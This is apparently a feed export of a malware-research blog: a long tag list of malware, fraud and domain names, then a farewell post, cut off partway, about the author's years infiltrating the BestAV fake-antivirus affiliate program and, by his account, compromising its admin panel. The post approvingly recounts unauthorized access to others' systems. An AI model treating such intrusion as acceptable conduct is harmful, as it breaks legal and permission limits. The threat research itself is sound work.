tag:blogger.com,1999:blog-5365964245877416061Sat, 07 Mar 2026 09:26:26 +0000RansomwarefakeavTrojan.RansomroguewinlockhomoblockerscreenshotAffiliateporn2o-rolik2.avi.exeCardingpornoplayer.exeTrojan.Ransom (Lock Em All)Trojan.Ransom (flash_player.exe)phishingcardSkimmerCitadelbestAVCarderSpamTracking Cyber CrimeskimHoaxNCRZeuSlockscreenDieboldPOSTrojan.Ransom (HomoBlocker)WincorblackholeransomArchSMSMBRSpyEyeHoaxSMSRansomlockTrojan.MBRlockasmhackforumpos malwareHackedPhish-BankFraudSMSSendSkimmingdarkodeexploit kitfakepaysafecardram scrapperukashCarberpCodeFakePoliceAlertPharmaPoint Of SaleRDPSecurity ShieldXyliboxlockermalwarestealertrack2EDFFakeInstPaypalPoint-of-SaleSecurity ToolSystem ToolWebinjectacid.david9 ransomlockcarding shopATMAlinaBraviaxCrackingEssential CleanerKeygenMeLiberty ReserveMS Removal ToolMystic CompressorPanelSeveraTR/FraudTrojan.RansomwareVisaWSOXORZaxarblockerleaknanopolicelockspammingA-Fast Antivirus rogue keygenAndroidBezelBlackhole Exploit KitBotnetC&CCitadel 1.3.5.1ExploitIceIXMADMasterCardPrivate AV CheckerRemoval GuideSecurity Shield 2011TDSTotal security 2009Track2 grabberTrojan.Ransom (flash_player.exe) 8903452262600 8-903-452-26-2600bankerbankingcrackmedumphackhappy new yearhologramslamelrmemory scrapperoff-sho.repay per installpornoplayershopsniffertrack2 scrappervb677.221.149.219AESATSAdslockAdvanced Virus RemoverAldibotAlureonAmexAndromedaAntivirus 8Antivirus AntiSpyware 2011Antivirus ProtectionAquaboxAvastBTCBluetrashC1F20D2340B519056A7D89B7DF4B0FFFCAFCCCanadaChequeCitabCold$ealCredit CardsCycbotDKDelphiDexterDorifelExManoizeFake MSE AlertFake.HDDFilecoderFindWindowAGribodemonHFInternet Security 2010InterviewJava Drive-ByJava.SMSSendKeygenningLOLLR Curl scam scriptLamerLamersLock Em AllMISCMITBMailienMalware ProtectionMalwoxMayachokMoney launderingNRBOperaPOSCardStealerPaunchPersonal Shield ProPhoenix Exploit KitPlastic servicePower LoaderPowerLoaderRATRaspberry PiReplicaRogue-Security-Product-As-A-ServiceRovnixSMSSUTRAScamSecurity essentials 2010Security essentials 2011Silence WinlockerSkimmersSmart Protection 2012Smoke LoaderSpambotSpyware ProtectionSystem SecurityTrack2 malwareTrojan-Ransom.Win32.XoristTrojan.Ransom BKA RansomwareTrojanRansom.XoristVAN32VPNVirtualProtectExW32.XoristWindows ScanWriteProcessMemoryXSSXorist.cZenk-Securityassemblerassemblyav checkerbackdoorbankbase64bitcoinblack processorbookcardersccshopcompromisedcredit carddefragerdicedriving licensedumpseBayfacebookfailfake documentsflashformgrabberfraudgreenroundhashjava rhinokeygenkeyloggerlampeduzalinuxmafinano wincorownedpharmingphishphpplasticprocessing servicesecurity tool roguespammertrack 2track 2 grabbertrack1videowinlockerzip-archive.comскиммер(xxxvideo.avi.exe)+16464816878.NET001214080994009734674574750702153405374322251-866-286-61621.0.0.21.0.0.5100 euro10293838142.4.105.98142.4.105.9915-Minut184.107.77.70184.22.103.202184.82.162.163200 euro2012204.188.221.23824-tabs.ru24hourdrugsource.com27C32in1pill.com365pills3D Models3D Skimmer3c09a47b4a673a9e46cb0de70b02454d3d4093245501410011066189985423 877 01584B5050 euro500 Eur500 euro591901995369564.32.10.17164.85.233.87*108#7304461.exe7xTUBE7xVideo7xVideo D17xVideo WG18 (906) 096-4547890609645478926107216689653751844911-013-30-35988-185-37-42A "Loader" CaseAES cryptovirus GpCode 2011 GPcoder.j RSA-1024 Troj/Ransom-U TROJ_RANSOM.EWQ Trojan.Gpcoder.G Trojan:Win32/Ransom.BQ RansomwareAES cryptovirus GpCode 2011 GPcoder.j RSA-1024 Troj/Ransom-U TROJ_RANSOM.EWQ Trojan.Gpcoder.G Trojan:Win32/Ransom.BQ Ransomware Trojan-Ransom.Win32.Gpcode.bnAKM Antivirus 2010 ProANDI RAZVAN SIMIONATSEngineAVAV Guard OnlineAV Protection OnlineAV Security 2012AV Security EssentialsAV-AFF.BIZAVG Anti-VirusAVG AntivirusAWM AntivirusAc1db1tch3zAccPhishAcid Drop 1.5Acid-AlchemyAdobeAdslock.AAdultAdvanced PC Shield 2012Advanced Security Tool 2010 Security Central Home Personal Antivirus XP Deluxe Protector Win PC Antivirus Win PC Defender XP Police Antivirus IE-Security WinDefender 2009 and Total Secure 2009 rogueAdwareAffPrimeAffiliatesAlphaPackAlueronAmerican ExpressAmnesiaAndroid.SpitmoAndroid.Trojan.Rubobi.AAndroid/FakeToken.AAnonJDBAnother cc-grabbers admin panelAntimalware DoctorAntimalware PC SafetyAntimalware ToolAntivir 2010Antivir Solution Pro AV Security Suite AntiSpyware Soft Antivirus Suite Antivirus Soft clone RogueAntivirii 2011Antivirus 2011Antivirus 7Antivirus Clean 2011Antivirus GTAntivirus Smart ProtectionAntivirus SystemAntivirus7 Antivirus8April foolArizonaAsusAtmosAtraxAtrax BotnetAudio SkimmerAutodesk Inventor Fusion 2013Avast-antivirus-francais.exeAvast.exeAviraB208016071489BAT.KillFilesBBACBHBR300BRASOV (Romania)BSRBackDoor-ARDBackDoor.FeardoorBackdoor.Citadel.BkCnctBackdoor.IRCBackdoor.NuclerootBadgeBank AccountsBank Of AmericaBar Code Slot ReaderBarcodeBarracuda LoaderBc5rw12Beats by dr.dreBest Virus ProtectionBestSoftBetabotBetabot 1.0.2.5Betabot 1.5.0.0Betabot 1.7.0.1BillingBiran KrebsBitDefender Antivirus Pro 2011BitDefender_Antivirus_Pro_2011.exeBlack SoftwareBlack processing serviceBlackPOSBlackSofwareBlackhole 2.0Blackhole exploit kit v1.1.0Blackhole exploit kit v1.2.0Blackhole v1.2.1BlueFlare AntivirusBombacashBooks SellersBrainfuckBrand Name SoftBrand SoftwareBrowser SMS HoaxBruteForce.WPBuy Cheap OEMC+C++CC-DealerCCCCMCCN1CNCCRC32CVE-2010-1885CVE-2011-3544Caixa PenedèsCaliforniaCamera boxCampaignCanal plusCanal+Capital OneCaptain BarbarossaCarberp C&CCard ReconCard readerCarding managerCardingStuffCardingmaster.comCarpwnedCarrefourCash-trappingCashPartnersCatTradeCenterCashCenturionChameleon rogueChase FreedomChase SapphireChromeCidoxCigIncomeCigarettesCitadel 0.0.1.1Citadel 1.3.5.1 BuilderCitadel 1.3.5.1 Remote Code ExecutionCitadel 101Citadel Hardware IDCitadel KeyCitadel LawsuitCitadel Rain EditionCitadel leakCiti BlackCiti PlatinumCiti ShellCleanThisClearLockClickerCloud ProtectionCocainCode CaveCoguarCompressorComputer is blockedConsuellaContemporary Profiling of Web UsersContracts killingCookies MoneyCoreguard Defense Center Protection Center Data Protection Digital Protection Your Protection User Protection Dr. Guard Paladin Antivirus AnVi RogueCounterfeit banknotesCracking CitadelCracking SpyEye 1.3.xCreating a online Ransomware unlockerCrimepackCryptoServiceCryptorbitCuckooCurlCurl Scam scriptCyberbunkerCythosiaDDoSDSC0912637.scr a194e793d739fb40b217b5775a6c7250 BR malwareDUMP MEMORY GRABBER v2.2 B1T moded by Ree4DahouDamballaDarkCoderScDarkcometDarkcomet RATDebugDecoding Security Shield Fake scanner pageDeep WebDelFilesDemystifyingDiebold AgilisDiebold SkimmersDigital StoreDisk Antivirus ProfessionalDisk OptimizerDisk RecoveryDiskerDjangoDorkbot.ADoveDownload binariesDr. Max KilgerDr.WebDrop serviceDrugstoreDump memory grabberE-Set Antivirus 2011EMV User and Programmer GuideEURO WinlockerEee pcEgypackElement ScannerEleonoreEleonore Exploits pack v1.2ElgamalEligiusElite VPN ServiceEmbosserEmbossingEncoder Builder v2.31Encryption virusEpubbEroDerevoEsSandRe crackmeEuro banknotesEvaPharmacyEyeStye.pluginFLASH10.exeFTPFUDFagsFake AVG Anti-VirusFake BitDefender 2011Fake ChequeFake E-Set Antivirus 2011Fake InstallerFake KasperskyFake SiteFake Windows ActivationFake eurosFake installersFake scanner pageFake scanner source codeFake.HDD Master UtilitiesFakeAV AffiliateFakeAV BusinessFakeAV GUIFakeAV SiteFakeHDDFakealertsFareitFarewellFast DiskFatonFear Client 1.5FeodalCashFeodalCash FeodalCash.ruFile Secure 2.1FirefoxFirefox_update.exeFive Hundred EuroFlash PlayerFloridaFragusFragus Exploit KitFranceFrench National IDFreshDBFreshdb.inFuLLzFynloski.AGCodeRogueGDIGEMAGPcoder.jGSMGTA2GagarincashGameGendarmerie NationaleGeorgiaGigabidGimemoGold InstallsGood MemoryGpCodeGpCode 2010GrandHostGreen AntiGreen NCRGregory CarpenterGroundLabs.Card.Recon.v1.14.7-Lz0Guard OnlineGuardia di FinanzaGuillocheHC StealerHDD Defragmenter System Defragmenter rogueHDD DoctorHO HO HOHSBCHSBC BusinessHSBC FranceHSBC PlatinumHTTPHack.lu 2k10 CTF "Pirates crackme" write-up Zenk-SecurityHack.lu CTF Beer challengeHackerzvoiceHacktool.Citadel.BuilderHadèsKeyHard Drive crashHardware IDHarm.Win32.FakeMbr.aHash collisionHerbalsHermesHerpesHexingHitmanHoax SMSHoly shit a new post!Home Safety EssentialHome Security SolutionsHoneynet ProjectHot StampingHow to debug MBR RansomwareHow to hex a malware and make a builderHow to submit a sample to antivirus companiesHyperliskID CardsIDA ProISFBIce9IframeIframeShop.netIframerIllinoisInfostealer.DexterInside the FakeAV BusinessInstall_Flash-Player.exeInternet ExplorerInternet Explorer Emergency ModeInternet Security 2011 rogueInternet Security 2012Internet Security GuardIntroduction au cracking sous LinuxItalianJ.P.MORGANJade JonesJapanJava AtomicJe T'aimeJohn Doe 25Jolly Roger StealerJoomlaKEYGENiNG FooMe 1 With XylitolKINSKawaii SecurityKeitaroKentuckyKeyGenMe for Newbies :: Progressive KeygenMe #1Keygenning4newbies CrackMe 1 coded by tHE ANALYSTKitKnucker.CLOLKitLame winlockLast and final post for me about darkodeLinkedIn SpamLinux kernel exploitLive Security PlatinumLizamoon varianteLoader serviceLock Em All varianteLockDesignerLog parserLogs parserLouisianaLoveLetterLuTiN NoIR Small RSA keygenme for newbiesLuo Yun BinLux CashLuxury CashMAD 1.7MBRLocker Builder v0.1MC LogoMCIRMD5MFMP-FormGrabberMac OS XMacBook ProMail extractorMaillingMaineMake usersMal/DllHook-AMalware Auto-downloaderMalware Auto-downloader v1.3b xyliboxMalware Auto-downloader v1.4 xyliboxMalware Auto-downloader v1.5 xyliboxMalware Auto-downloader v1.6Malware Auto-downloader v1.7Malware Auto-downloader v1.7 Revision 3Malware Destructor 2011Malware Protection CenterMalwarebytes' Anti-MalwareMan in the browserMarylandMazaMazafakaMcafeeMeetingMemScan:Trojan.KillMBR.SMemory OptimizerMerry christmasMichiganMilestone AntivirusMillenium-ServersMississippiMobileMonerisMoney Racing AVMoneyPakMoneycouldMulti LockerMulti Locker 3Multi-platformMultirogueMultirogue DefenderMyFullzMyReplica.ruMysticNCR CameraNCR GreenNCR RoundNCR SelfServNETSKY ProjectNano NCRNapal Rogue BuilderNapalm Rogue BuilderNapolarNetWireNetherlandsNeuromodelNeutrino botNew JerseyNigerianNocturne V4NortonNuclear Exploit PackOEMOEM SoftwareOTP forwarderOakleyOficlaOhioOpenCloud AntivirusOptevaOrangeOrgiGuruOther Equipment ManufacturerPC Defender PlusPC Defender antivirus roguePEcompact2POS GrabberPOS SystemPPPPCPPIPPSPVC ID Credit Card Embossing machinePalladium ProPanel for NCRParental LockPay For InstallPaypal shopPeaxPerkelPerkelePeruPetroleumPharmIncomePhasePhishing kitPhoenixPhoenix Exploit Kit 3.1PhonePicebotPikboclick.APlasticsPlaystationPlease bitchz i'm fabulousPonyPony 1.9Power Loader 2.0PowerZeusPoxterPr1v37*Fr0m*Be10Ru551aPrivacy ProtectionPrivatCoinProfitBins.ruPvEPvPQuickBasicQunneDR3000RBN Encryptor SoftwareRCERSARSA javascriptRSA-1024Rain EditionRanbyusRansomHelper 1.0 / Malware Auto-downloaderRansomware Targeting AmericansRansomware who XOR your fileRançongicielReady to Ride v3ReliaHostRemote Code ExecutionReplica WatchesRev0LtReverse DeceptionReverse Deception: Organized Cyber Threat Counter-ExploitationRevetonReview of the SpyEye Toolkit v1.3.45RippedRogueAVRome0Round NCRRovnix.DRëFFSEOSFRSIB ServiceSKY-LoaderSKY-Loader v.1.2SMTPSSHSSLSTR. DACIA 73SUTRA TDSSWSadokSakura Exploit Pack 1.0Sakura exploit kitSalesSaltSamsung Galaxy SSantanderSatan 1.5ScarewareSean BodmerSecurity CenterSecurity DefenderSecurity Essentials Ultimate PackSecurity Guard 2012Security Monitor 2012Security ProtectionSecurity ScannerSecurity Shield Pro 2011Security Solution 2011Security Sphere 2012Security essentials 2011 Security essentials 2010 Internet Security 2010 Advanced Virus RemoverSeftadSerenity Exploit KitSerenity ScannerSergioSerial killersSexDerevoShellSigpanel UVSilenceSimda.ASirefefSlavikSmart Anti-Malware ProtectionSmart Fortress 2012Smoke BotSmsPiratBotSocial engineeringSoft StoreSoftBunkerSoftware SellersSolarSolarisSolutionSophosSourceSpamHausSpamming shopSpanish VersionSparkyJavaSpit FyreSpitmoSpyEye 1.3.41SpyEye 1.3.45SpyEye 1.3.48SpyEye Builder v1.1.39SpyEye Builder v1.1.39 (Botnet cracking session)SpyEye Builder v1.2.50 (Botnet cracking session)SpyEye Builder v1.2.60SpyEye v1.1.39 unpackedSpyEye v1.2.99 lameSpyEye v1.3SpyEye v1.3 interfaceSpyEye v1.3.39SpyEye v1.3.xSpyEye variantSpyware Protection RemoverSquirrel MailStarDustSteamSteganographyStimul PremiumStopHausStreamTorrentSunWatches.ruSuper AVSurething TeamSysinternals AntivirusSysinternals Antivirus XJR Antivirus AKM Antivirus 2010 Pro Your PC Protector Wireshark Antivirus rogueSystem Antivirus Microsoft 2011System Care AntivirusSystem CheckSystem FixSystem Security 2011System Security rogueSystem doctor 2014System plugin at address 0x00874324 got critical errorSystem plugin at address 0x3BC3 got critical errorTD GreenTD WorldTORTOR BotnetTOWPOWTROJ_RANSOM.EWQTarcloinTatangaTeamkNastTennesseenThePefectTime.ruThinkPointThree ElephantTiberium drop serviceTick PanelToXiiCTobfyTobfy.MTokenSpyToniTonijuve007TonixTotal ProtectTotalProtectTracking Cyber Crime: AV-AFF.BIZTracking Cyber Crime: BestAV and BlackSofware *Reloaded*Tracking Cyber Crime: Golden DucatTracking Cyber Crime: Ready to Ride v3 (Win32/Cycbot Affiliate)Tracking Cyber Crime: Virtest and Palevo (Private AV Checker) pwnedTracking Cyber Crime: WinAD gang (Ransom.DN/Win32.Timer) Traffic Distribution SystemTracking Cyber Crime: Zip Archive Affiliate (Hoax SMS/Fake Installer)Traffic Distribution SystemTravelers ChequeTritaxTroj/Ransom-UTroj/Skimer-ATroj/WowSpy-ATrojan.ClickerTrojan.FakeAV.LVTTrojan.Gpcoder.GTrojan.HDDKill.517Trojan.KardphisherTrojan.KillFilesTrojan.KillMBR.apTrojan.Ransom (Pornoblocker)Trojan.Ransom (bioritm.exe)Trojan.Ransom (flash_player.exe variant)Trojan.Ransom (flashplayer.exe)Trojan.Ransom (porno-rolik.avi.exe)Trojan.Ransom (userinit.exe)Trojan.Ransom (virussign.exe)Trojan.Ransom Fake Metropolitan PoliceTrojan.Ransom Microsoft Security AntivirusTrojan.Ransom.BootTrojan.Ransom: La policía ESPAÑOLATrojan.Ransomware keygenTrojan.Siggen5.64266Trojan.WPCracker.1Trojan.Win32.KillMBRTrojan.Win32.KillMBR.awTrojan:Win32/Ransom.BQTrojan:Win32/Tobfy.MTrue Big CashTrusteer-Mobile.apkTuringU157727070520U235459552163U264040669509U2909099UFDCUSAUSBank PaywaveUSPSUVUlockerUmbra loaderUmbrellaUniq packUniversité Française de CrackingUnknownUnxoring TR.Ransom.XoristVB6 VirusTotal Mass rating toolVBSVMwareVPSVampire.VnVendigoVersandVertexNet v1.1.1 LoaderVertuVertu CashVertuCashVideo GrabberVirtualizationVirusKeeperVirusTotalVulnerabilitiesW32/PixSteal.AWPCracker.1WUWalletWapSystWashingtonWatch4.ruWaterEffectWaveASMWayback MachineWeb RATWeedWeird ransomwareWestern UnionWin32.AdwareWin32.BuzusWin32.StartPageWin32.Umbald.AWin32/Atrax.AWin32/Kelihos.BWin32/Spy.POSCardStealer.OWin32:KillMBR-DWinDiskWinLocker Builder v0.2 Cracking Generated winlocksWinLocker Builder v0.4 Cracking Generated winlocksWinRARWinRAR 2011WinRARcWinScanWindowsWindows DiskWindows Oversight CenterWindows Problems ProtectorWindows Software ProtectionWindows Threats DestroyerWindows XP Recovery EDSWindows XP RestoreWindows license lockedWindowsToolWindowsWebSecurity.exeWinlock AffiliateWinlock Builder [Private] v1.30Winlocker builderWireshark AntivirusWisconsinWizard MobileWolfram AntivirusWorld Of WarcraftX45976XAT LoaderXJR AntivirusXP Anti-Spyware 2011XP Anti-Virus 2011XP Home Security 2011XP Internet Security 2011XP Total Security 2011XSSedXTCXc0d3rXylibox Malware Challenge 2# - SolvedXylitolXylitol is powerfulYamba networkYambo FinancialsYou can run but you can't hideYour PC ProtectorYour Windows has been blockedYour computer's file system has encountered a serious error. Please restart the computer or call support at 1-866-286-6162Z66049981965ZbotZentom System GuardZeus 1.1.2.1Zeus 1.1.3.4Zeus 2.9.6.1Zeus RedZeus v2ZeusAESZeusVMZip-WapZipArchiveZwResumeThreadaccidentadminshop2013.comalexudakovalgorithm implementationalina source codeall your base are belong to usallocated memoryand many crapsasm.yeah.netav scanneravastfrance.comback soonback-endbadbase.rubastard.subdropbeats probestavsoft2beware of fake banking applicationsbhstatbillbin listbl4kj.zapto.orgblacksoftware.ccblackwireblank cardblockedblog newsbooksnetdownloads.combooterbosi.subotnet phonebpbruteforcebuilderbulkbulletproofbundespolizeibx1c99cPanel bruteforcercandytripcar documentscard shopcardscardsmarket.sucarp shopcash trapcc memory grabbercc-grabbers admin panel bender editioncertificate of nationalitychargebackcheapMinercheckchk4me.comclick fraudclientcode sourcecodingcold deathconsuella.netcontractorcounterfeitcpcpaleadcpanelcracked as usualcrimecrypto/hash/calc toolscryptolibcryptoviruscurse.pwcustom packercybercrimedatingdd2.rudiabetal.orgdigitalbooksonlinenow.comdisapperancedlldoktordick.comdon't order from RS Components Ltddownloaddramadramascenedriver licensedrizzdumping romdumpslogseasyekoparty Security Conference 6 - Challenge ESET 2010emailsencodingeuroeuro noteseurosexplorerr.exefake administrative documentsfake defragmenterfake drafragfake eurofake french documentfake pharmafemale-orgazm.comfile35820289892.exefileunblock gmail.comfindvirus.ruflagcounterflash_playerflat slimforumsccfrmcpfubargameboygangstaservicegategaygbot.exegetdumps.comgradebooksonline.comgreatbooksdownloads.comhackinghologramholoshomicidehotwatches.ruhowhow i carded myselfi'm awayiBankiBankingiZER0xidentity cardsidentity currencyidentity theftidiotsieup.co.cciferrari.ruinfiltrationinfraudinterrogationishygddtjava appletjavascriptjs.php infectionkaspepsky.rukcaptchakillerkillmbrkrebsonsecuritylammerleadsletter templateslibretyeserve.comlifelife & shitlithuana bankloaderlocklogslulzsec.suluoyunbinluvservice.beluxcash.rumailmainpanelmalicious appletmalware affiliatemalware reversingmalware unpackingmalwaresmalwox.bizmapped sizemerchantmicro cameramicro wormmining poolmmonmmon.exemodelsmoneymoneypackmsrmulti-roguemulti-scan.commurdermy-sdesign.commybooksplace.comnetox.bizngrBotno dependenciesobfuscatedobfuscationoctavianoffshoreorganized crimeoverdoseownzpUrepaper moneypaperbackpartnerpassportspassprtspawn-shop.ccpayement for fakeavpaymentspcapphishing templatephishing templatesphotoshoppirateplasma HTTPpokerpornoblockerpornorolikpornozudpos snifferppc.supremiumphones.ruprimitive RunPEprivateprivate_brute.exeprojectHookproxiespwnedpwningr57ransomblockrdasrvreVoLutionredirectorree4refundregeditreplicaiphone.rureproductionsrequirements specificationrescatorresellerreversereversingriprootroundround 2ru-tabs.rurupoppers.comrussian lockerrutabletki.comrx-partners.bizsacemsafe-data.rusaliter.exescan4youscan4you.netscrappersecurity-center inbox.ltsecurity116see ya in 2012see ya in 2k12seriousbiz.rusevantivir.comsha1sigskimsso longsp3cial1stspam campaignspam shopspamb0xspamb0x.comspamersspammer shopsparksparksspysqlsqlistar-stat.comstealstickersstill lamestubssuicidesuper-socks.comsupern0vaswfteller machinethebookssellers.comthesoftwaresellers.comtiberiy.protonijuve10tonijuve11tonijuve28toturetrack1 generatortracking cybercrimetritontrizonta.ruuTorrentudpudp flooderukr-tabs.ruukrtabletki.comunpackunpackedunpackingupdateupxuselessutility billv1.150.1valentinevariablesmscheck.hispamediamarketing.comvariantevendettasvertudiamond.ruvideo72.avi.exevideograbber.dllvirtual skimmervirussign(3).exevkpay inbox.ruvksh0pvmZeusvmadumpsvnloadervskimmerwe-deal.netweb crabweb.archive.orgweelsofwho view my profilwinADwinlock targeting French peoplewinlockswirewire transferwlnrar-auth5.netwmwormwowmatrix.pwwowmatrix.pw.pwwtfwtf seriouslyxddd.66ghz.comxfrzxxm-91xxx_video_32605.avi.exexxx_video_New4.exeya-snimu-egoyambaclick.comyambaprivate.comyandex.ruyourbookdownloads.comyoutubeyummbazarkaa.infozip-help.comzipmonster.ruАтмосуДропКОМПЬЮТЕР ЗАБЛОКИРОВАНЛОКЕРМеркурийПантераСистема управления SmsPiratBotХендехохвинкорзевсзевсаподобногоинфапайзафекардскимукашカワイイセキュリティIf you want to make enemies, try to change something.https://www.xylibox.com/noreply@blogger.com (Steven K)Blogger631125tag:blogger.com,1999:blog-5365964245877416061.post-2448599809824740900Sat, 13 Sep 2025 15:26:00 +00002025-09-13T17:27:17.254+02:00AffPrimebestAVBestSoftCookies Moneyexploit kitFarewellHackedSoftBunkerVendigo<p>Hello everyone, it's been a while.</p><p>One of the first affiliate systems I ever infiltrated was BestAV, back in 2011, the same year I started XyliBox.<br /><br />Over the years i infiltrated most of the major FakeAV affiliate programs and BestAV was the biggest player in this scene.<br />It was also the one i kept coming back to, a bit like me vs darkode :)<br />It became something of a coup de cœur for me, even if that term doesn’t quite translate outside of French.<br /><br />Eventually i watched it fall, not from law enforcement, but simply because more lucrative threats arrived like ransomware and cryptolockers, they kinda made fakeAVs irrelevant.<br />Although BestAV launched a ransomware affiliate later and put lot of efforts into it, they didn't survive.<br /><br />I also never really gave this blog a proper farewell.<br />Like most things from that era, it just… slowed down.<br />There’s still a pile of never-published stories and drafts sitting in my backend; hacked panels, and half-finished notes, strange old artifacts from a time where everything was fast, broken, and fascinating.<br /><br />BestAV feels like the right way to close this circle.<br />It was the beginning, the obsession, and the last of its kind.<br />So this post is both a final deep dive and the official end of XyliBox.</p><p></p><p></p><p></p><p></p><p></p><p></p><p><br /></p><p><br /></p><p></p><p></p><p><br />Before we dive in, a bit of context for those who weren’t there or just want to refresh their memory about BestAV.<br /><br />The first time I looked into a FakeAV affiliate and also the first time i heard of the BestAV program was in 2011, and it all started with a tweet that led to my first write-up: <a href="https://www.xylibox.com/2011/06/tracking-cyber-crime-inside-fakeav.html">Tracking Cyber Crime: Inside FakeAV (June 2011)</a><br /><br />From there, i kept watching them from the shadows, sometimes giving them hints on the fact that i had still access to their system, just in case they were reading (and I was pretty sure they were): <a href="https://www.xylibox.com/2011/07/personal-shield-pro.html">Personal Shield Pro (July 2011)</a><br /><br />I went back again into BestAV, where the real obsession began: <a href="https://www.xylibox.com/2011/08/tracking-cyber-crime-bestav-and.html">Tracking Cyber Crime: BestAV and BlackSoftware (August 2011)</a>&nbsp;<br /><br />In 2012, I even infiltrated an affiliate who was built based on BestAV backend: <a href="https://www.xylibox.com/2012/02/star-statcom-reseller-bestavsoft2.html">Star-stat.com Reseller (February 2012)</a><br /><br />A bit later i also wrote a small guide on how to infiltrate affiliate programs, not just FakeAV anymore, but any affiliate system. Of course, I used BestAV as example:&nbsp;<a href="https://www.xylibox.com/2012/06/how-to-infiltrate-affiliate-programs.html">How to Infiltrate Affiliate Programs (June 2012)</a></p><p>&nbsp;<br />I stayed hidden in this affiliate for a long time, monitoring their activity, quietly collecting samples, and following their moves.<br />Along the way, I teamed up with Siri, Kafeine, Antelox, and many other friends I met on the path, working together to excavate their exploit kits, samples, and test setups.<br />We see them evolve, and even launching a <a href="https://malware.dontneedcoffee.com/2013/05/the-missing-link-some-lights-on-urausy.html">ransomware affiliate</a>&nbsp;(Urausy).<br />Sometimes we pulled datas at scale, like in 2013 when we massively burnt their crypt system by dumping lustrami.com infrastructure on VXVault, this one was tied to BestAV.</p> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiomKib2IuaL8qYK0uqDNK2G3N8xDn_lCnFzr0dLtudYJdaLUd-hvXW1cnNajoACIXs-Pj8ibFOS3lBIisyBGYgCMCIXmkpI7s_TOVvD8PlJFGAFpbrMVOMw-njdYYEHqE2ni9TkZbv3I/s1600/03-08-2013+18-07-02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiomKib2IuaL8qYK0uqDNK2G3N8xDn_lCnFzr0dLtudYJdaLUd-hvXW1cnNajoACIXs-Pj8ibFOS3lBIisyBGYgCMCIXmkpI7s_TOVvD8PlJFGAFpbrMVOMw-njdYYEHqE2ni9TkZbv3I/w400-h348/03-08-2013+18-07-02.png" width="400" /></a></div><br />And finally, we’re in 2014, the fall of fake antivirus had already begun.<br />So what can we say about BestAV at this point?<br />Their affiliate system was already in bad shape, plagued by frequent downtime and a clear loss of momentum.<br />Keys players stopped working with them, we could feel the collapse coming.<br /><br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT3oYg4Ng66HDTFWqy5xQVlfoiFPimhTfcUADWtmKojpyDr-g3yRG8qOlfXQClQpSSGBYWBN9niAPjzRm6nl8ngcHK5k6FGisHnvd8CLrUYaRWKyvU9-KftLDfVxIf1dbC6Cnz5J3FVcM/s1600/09-04-2014+15-07-52.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT3oYg4Ng66HDTFWqy5xQVlfoiFPimhTfcUADWtmKojpyDr-g3yRG8qOlfXQClQpSSGBYWBN9niAPjzRm6nl8ngcHK5k6FGisHnvd8CLrUYaRWKyvU9-KftLDfVxIf1dbC6Cnz5J3FVcM/s1600/09-04-2014+15-07-52.png" /></a></div>&nbsp;<br />So instead of looking at it "again" from an affiliate level, let's switch perspective to the administrator side.<br />It’s been over 10 years, so i guess i can finally say it: We pwned them!<br /><br />The intelligence was of course shared at that time with some agencies who were interested, mostly because of the key players involved in participating on BestAV.<br />I never made that public on the blog the operation was too tight back in time to just drop a "good day, you’re pwned!" or similar like i used to do on my posts.<br />Not due to the BestAV admins reading this blog, but because of all the affiliates being monitored in some way.<br /><br />So I hope you'll enjoy these screenshots it’s one last chance to document the inside operation before their ultimate take-down the same year.<br />I think it's also the first time that a FakeAV affiliate program will be documented this way.<br /><br />Home:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0KCq0ZWPmk5Mq6kuk4p_oiht9H0-Kbi6-wrTb-rAou-AbbinWLMEBWuhxxty58FtndP_ynAgMxml4VJcwHF6Lh1PBNEbGmycEQWpA84i4jbM5xlgVplloQ0iL6cFqITqB0gp6P1jABfU/s1600/09-04-2014+13-42-15.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0KCq0ZWPmk5Mq6kuk4p_oiht9H0-Kbi6-wrTb-rAou-AbbinWLMEBWuhxxty58FtndP_ynAgMxml4VJcwHF6Lh1PBNEbGmycEQWpA84i4jbM5xlgVplloQ0iL6cFqITqB0gp6P1jABfU/w400-h277/09-04-2014+13-42-15.png" width="400" /></a></div> <br /> Edit article:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-yxIBzcFwqkw2OqCLr4dPOaEg8Eok7v48AMUj4W6wJQgs7E5tcidaZxW5nmMobKE0tLFpT1rJ5y0rrv9KpFWoK-CvoUrYuB8dTGjK7iWeNSDqygJltMrjKS-t5OKNHNt4BsJElP3TwM/s1600/09-04-2014+13-43-03.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-yxIBzcFwqkw2OqCLr4dPOaEg8Eok7v48AMUj4W6wJQgs7E5tcidaZxW5nmMobKE0tLFpT1rJ5y0rrv9KpFWoK-CvoUrYuB8dTGjK7iWeNSDqygJltMrjKS-t5OKNHNt4BsJElP3TwM/w400-h277/09-04-2014+13-43-03.png" width="400" /></a></div> <br /> Statistic Soft 1:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcxPyY3AJt0vwB7HkKyDjvo39MTy82y4UKEh2_xDsDkzf8UMjbCciNjBIvN62B7HXoSvXknxoghhnyvSKYrBGnlcyF-ZFWAkapFkEu_jkfP6-Gct-HiS2G-TptJR747R31ZLeSzu82czE/s1600/09-04-2014+13-45-23.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcxPyY3AJt0vwB7HkKyDjvo39MTy82y4UKEh2_xDsDkzf8UMjbCciNjBIvN62B7HXoSvXknxoghhnyvSKYrBGnlcyF-ZFWAkapFkEu_jkfP6-Gct-HiS2G-TptJR747R31ZLeSzu82czE/w400-h316/09-04-2014+13-45-23.png" width="400" /></a></div> Soft 2:<br /> 